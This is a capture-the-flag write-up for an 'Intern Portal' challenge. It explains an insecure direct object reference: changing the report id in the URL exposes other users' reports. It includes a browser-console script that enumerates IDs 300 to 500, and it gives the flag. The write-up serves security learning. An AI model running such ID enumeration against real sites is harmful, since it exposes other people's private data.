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CTF Write-Up: Intern Portal (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Challenge Info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Name: Intern Portal</w:t>
        <w:br/>
        <w:t>Points: 769</w:t>
        <w:br/>
        <w:t>Vulnerability: Insecure Direct Object Reference (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This challenge involves exploiting an IDOR vulnerability by manipulating the 'id' parameter in the URL to access unauthorized reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Created an account and logged into the application.</w:t>
        <w:br/>
        <w:t>2. Found a report creation feature with title and content fields.</w:t>
        <w:br/>
        <w:t>3. Observed URL pattern: /report?id=13884</w:t>
        <w:br/>
        <w:t>4. Modified the id parameter manually to access other users' reports.</w:t>
        <w:br/>
        <w:t>5. Confirmed IDOR by accessing multiple IDs like /report?id=1, /report?id=5.</w:t>
        <w:br/>
        <w:t>6. Identified hints in reports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - Report #5: 'Definitely too low'</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - Report #6: 'maybe 300 above us'</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Automation Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Used a browser console script to scan IDs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>for (let i = 300; i &lt;= 500; i++) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  fetch(`/report?id=${i}`)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .then(r =&gt; r.text())</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .then(html =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const doc = new DOMParser().parseFromString(html, 'text/html');</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const text = doc.body.innerText.trim();</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (!text.match(/Fake report #\d+/)) console.log(`ID ${i}:`, text);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The script filtered out fake reports and helped locate the correct report containing the flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CIT{Acc355_C0ntr0l_M@tt3rs!}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